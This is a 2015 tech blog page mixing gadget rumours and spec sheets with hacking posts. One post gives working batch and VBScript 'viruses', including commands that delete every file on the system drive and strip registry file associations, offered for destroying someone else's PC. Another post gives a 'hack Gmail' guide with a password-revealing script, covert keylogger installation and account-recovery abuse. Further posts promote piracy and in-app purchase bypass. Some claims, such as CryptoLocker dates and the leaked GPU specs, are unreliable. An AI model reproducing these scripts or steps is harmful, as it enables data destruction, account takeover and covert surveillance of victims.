Monday, July 13, 2015

Best Rooted Apps 2015 Android (DOWNLOAD)

1.GL TOOL {DOWNLOAD}
For tweaking Gaming performance of your device

2.FREEDOM {DOWNLOAD}
Free IN-APP PURCHASES

3.SMART BOOSTER {DOWNLOAD}
Ram cleaning

4.TWISTER MOD {click to download}
  overclocking app

5.ROOT FIREWALL PRO {DOWNLOAD}
Block unwanted apps from consuming your internet data

6.LINK2SD or CCSWE app manager {PLAY STORE}{PLAY STORE}
move your data to external card or link your OBB file from SD CARD

more soon

Tuesday, June 9, 2015

APPLE IPAD PRO

Apple has already created 2 sets of tab experience ,one with smaller 7inch IPAD Mini,and another with 9.7inch IPAD,
Now apple has decided to make another set with title "IPAD PRO".yes,the name itself says it all,so ,It is clear that the apple's pro will have larger screen size,than the predecessor.
This new tablet from apple will be made availble from 2016 june onwards,

This new ipad will be serving the users with new features,
Bluetooth Enabled Stylus, NFC , USB-C port.
The features does not stop here,this one will be powered with silver nanowire touch panels in which they are more flexible than current technology,This evolution touch technology can understand the user's touch pressure,which give rise  for many apps and games,This technology will be termed as "FORCE TOUCH TECHNOLOGY ".This technology has already used in apple's watch,13-inch MACBOOK and 12-inch MACBOOK.

Release Date: June ,2016 

Monday, June 8, 2015

XBOX ONE CUSTOM HACKS

Xbox hackers had confirmed that they would release the hacks before august of this year .
stay tuned in this blog to get updates.

From next update we will show you step by step method to hack your xbox one to run pirated games.
so,kindly stay updated to this blog for tutorials,helps, and many more 

How to Create 09 viruses that will destroy a computer ?

Computer virus making programs are getting popularity now a days,It's mostly used for pranking friends or destroying someones datas or pc ,All the codes are mentioned below,USE IT IN YOUR OWN RISK.

1. CREATE A TEXT DOCUMENT AND ENTER THE CODES TO IT
2.SAVE THE FILE AS ".bat"  FORMAT (If it does not work save the file as ".vbs" format)
3.THIS VIRUS WILL START WORKING IF YOU OPEN THAT SAVED FILE,SO TO DESTROY SOMEONES PC,SIMPLY COPY THE FILE AND PASTE IT TO HIS PC AND RUN::::::
now,the ...::::BOOM:::......  happens


1)  ENDLESS NOTEPAD
       CODE:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


2) ENDLESS ENTER
      CODE:

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”

loop

3) SIMPLE VIRUS TO CRASH  A PC
     CODE:

   @Echo off
     Del C:\ *.* |y

4) ENDLESS BACKSPACE
     CODE:

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

5) CRAZY CAPS LOCK
    CODE:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

6) DELETES ALL FILES IN A DRIVE (xXx)
    CODE:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


7) DISCO  KEYBOARD LIGHTS  (num:7 & 8 has to be saved in .vbs format)( to terminate 
    CODE:
(num:7 & 8 has to be saved in .vbs format .To terminate  run task manager then,under "process" end "wscript.exe)


Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

8) DISCO CHAIN LIGHT
    CODE:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

9) DELETE KEY REGISTRY FILES ( This one is dangerous xxXxx)
    CODE:

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  FUCK OFF.
GOTO MESSAGE






NVIDIA GEFORCE GTX 990 ti specs leaked

NVIDIA GEFORCE GTX 990 ti

NVIDIA next flagship model has gained popularity even beforce its manufacturing .This card will be based on "BIG MAXWELL" GM200.The below are leaked specs and sometimes values may vary

SPECS

DIE SIZE :  601mm^2
MEMORY: 12 GB GDDR5
 CORES    : 3072 CUDA CORES

TEXTURE UNIT :248
RASTER DEVICES : 116
MEMORY BUS : 384-bit

TDP : 250 W
MEMORY CLOCK : 9 GHz
POWER CONNECTORS : 8+6 pin

PRICE : $799 - $999
MEMORY BANDWIDTH : 512 GB/s

CLOCK SPEED :1356 MHz
BOOST SPEED : 1456 MHz

RANSOMWARE NEW TYPE OF MALWARE :How to protect your files

Ransomware has been a while and i already grabbed many crimes and popularity,
Ransomware is a trojen which acts as a encrptor.If your system is affected by ransomware trojen,Thats going to a serious thread.Let me explain how this trojen works.

                        This trojen has integrated to many softwares,If you download one ,and after you use that affected software the trojen will select files or an entire drive and what it does ?.IT WILL ENCRYPT YOUR DRIVE OR FILES WITH A CHANCE OF DECRYPTING OF 0%
This trojan is now out in servers.They target some personalities and BOOM happens

so,The developers of this trojen dont want just to create a trojen to encrpt someones important files,   Their idea is make money.They demand the personalities to pay $100 -$1000 for decrypting the files.,in which everyone will give money as they the files are that much important for them

HOW TO GET AWAY : KASPERSKY claimed that they had found a decrypting tool that will decrypt the datas encrypted by ransomware.The tool can be downloaded from kaspersky's website

TYPES

CRYPTOLOCKER is a ransomware trojen :This trojen was started in 5th september 2015 and windows os was targeted first and now that trojen has supressed all other platforms

PGP CODE OR GP CODE: This is also following all steps to be a ransomware trojen..This trojen will be targetting  files with formates having   .doc,  .rar, .jpg, .xml , .html ,  .zip 

LG G4 SPEC

LG G4  is a flagship model , that was released in April 2015,This smartphone has competition with Galaxy s6 , s6 edge  ,  xperia z4  ,  Galaxy Note 4, HTC ONE M9

specs in nutshell:

PROCESSOR: QUALCOMM MSM8992 SNAPDRAGON 808 (DUAL-CORE 1.82 GHz cortex-                                A57 & QUAD-CORE 1.44GHz cortex-A53
GPU:  ADRENO 418

RAM:   3GB

STORAGE :  Internal- 32GB, micro SD up to 128GB

OS : Android 5.1 Lollipop

CAMERA : front- 8 MP (1080p@30fps )  , back - 16 MP (5312 x2988 pixels)
VIDEO: 2160@30fps ,stereo sound

SCREEN:   5.5 " IPS LCD ,16M COLORS
RESOLUTION:    1440 X 2560 pixels (~ 538 ppi)

BATTERY :   Li-Ion 3000 mAh

FEATURES :  BLUETOOTH 4.1, INFRARED PORT ,RADIO, NFC, microUSB v2.0 ,                                                   Leathery body



WORLDS FIRST 10 and 12 -CORE MOBILE PROCESSOR (Soc)

MediaTek ,developed a mobile processor named HELIO X20. This one is gaining all the attention from major smartphone manufacturers like ,SONY,LG,HTC etc,But SAMSUNG and MOTOROLA- are concentrating on their own chips and chips from QUALCOMM respectively

HELIO-X20 will be powered with 10- cores.It has a technique of running only one cluster ,while others stay down until needed,by this way company claims that they can save 30% of power

This amaizing piece of chip will be launching in DECEMBER 2015.Most high-end smartphones will be powered with this chip .

HACK GMAIL-3 WAYS

GMAIL HACK


Hacking is illegal ,stealing someones password or id is a legal offense.Anyways here are the hacks,These hack steps are simple 

1.Using Password Reminder Script

A) Go onto the computer of the person whose Gmail account you want to hack.

B)  Go to the Gmail login page. -Wait for the program to load their email address. Google will often automatically load the email address, but not the password.


C) Type the following script into the address bar (if copy and pasting from this page, remove the line breaks in a text editor first):

SCRIPT-

"javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)%20
{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+
=%20f[i].value%20+%20%22n%22;%20}%20}%20if%20(s)%20alert(%22P
asswords%20in%20forms%20on%20this%20page:nn%22%20+%20s);
%20else%20alert(%22There%20are%20no%20passwords%20in%20forms%20on%20this%20page.%22);})();.”


D)  Press “Enter Wait for the password to flash on the screen in a dialog box


2. Using Keylogging Software

A) Log into the person’s computer whose email you would like to hack.

B) Download SPECTORSOFT eBLASTER, which will capture every keystroke typed on the computer.

C)  Set up the keylogging software so that it emails you when the computer has used Gmail

D) Access the resulting stored logs once you receive the email. -The username and password can be discovered in these logs.

3) Via Password Recovery

A) Go to the Gmail home page. Make sure you are logged out. Click sign in the top right corner.

B) At the login page, click Need help? in the bottom right corner of the box.

C) Select I don't know my password. Click continue. Enter the email address you want to hack. You can put in any email address as long as it is registered. You shouldn't have trouble finding an email since there are thousands and thousands of Gmail accounts.
If you have trouble, put in something you know is taken.

D) Enter a totally random password, like password123 when you are asked for the last password you remember.
It won't work if they have a recovery email.

E) In the case that 2 step verification is enabled, click I didn't enable 2-step verification. It should let you continue.

F)  Enter your email address. This is where the password reset email will be sent. Type it again in the next box.

G)  Enter two random phone numbers in the next two boxes. Continue.

H)  Put in a date for the last time you signed into the account. Try to make it in the past month. Enter the date you created your account. The recommended date is about a year ago.

I)  Type in two or more random emails. Make up at least two label names. Suggestions are: Junk, Stuff, Friends, and Family. Type your email in the last box.

j) Put in two other Google products. Make sure that they are recent. They cannot be in the future.
Skip the Additional Information box if you don't want to answer it.



K) Check your email. There should be an email from Google asking you to reset the password.

EXTREME INJECTOR v3.3 -Download

Here is the software.

CLICK TO DOWNLOAD

USES
This awesome little app can make any softwares with problems in specs to run  by bypassing the issue which stopped the software from running

you can play quad core supported latest pc games in dual core
You can run 6 GB minimum required ram needed games in just 4 GB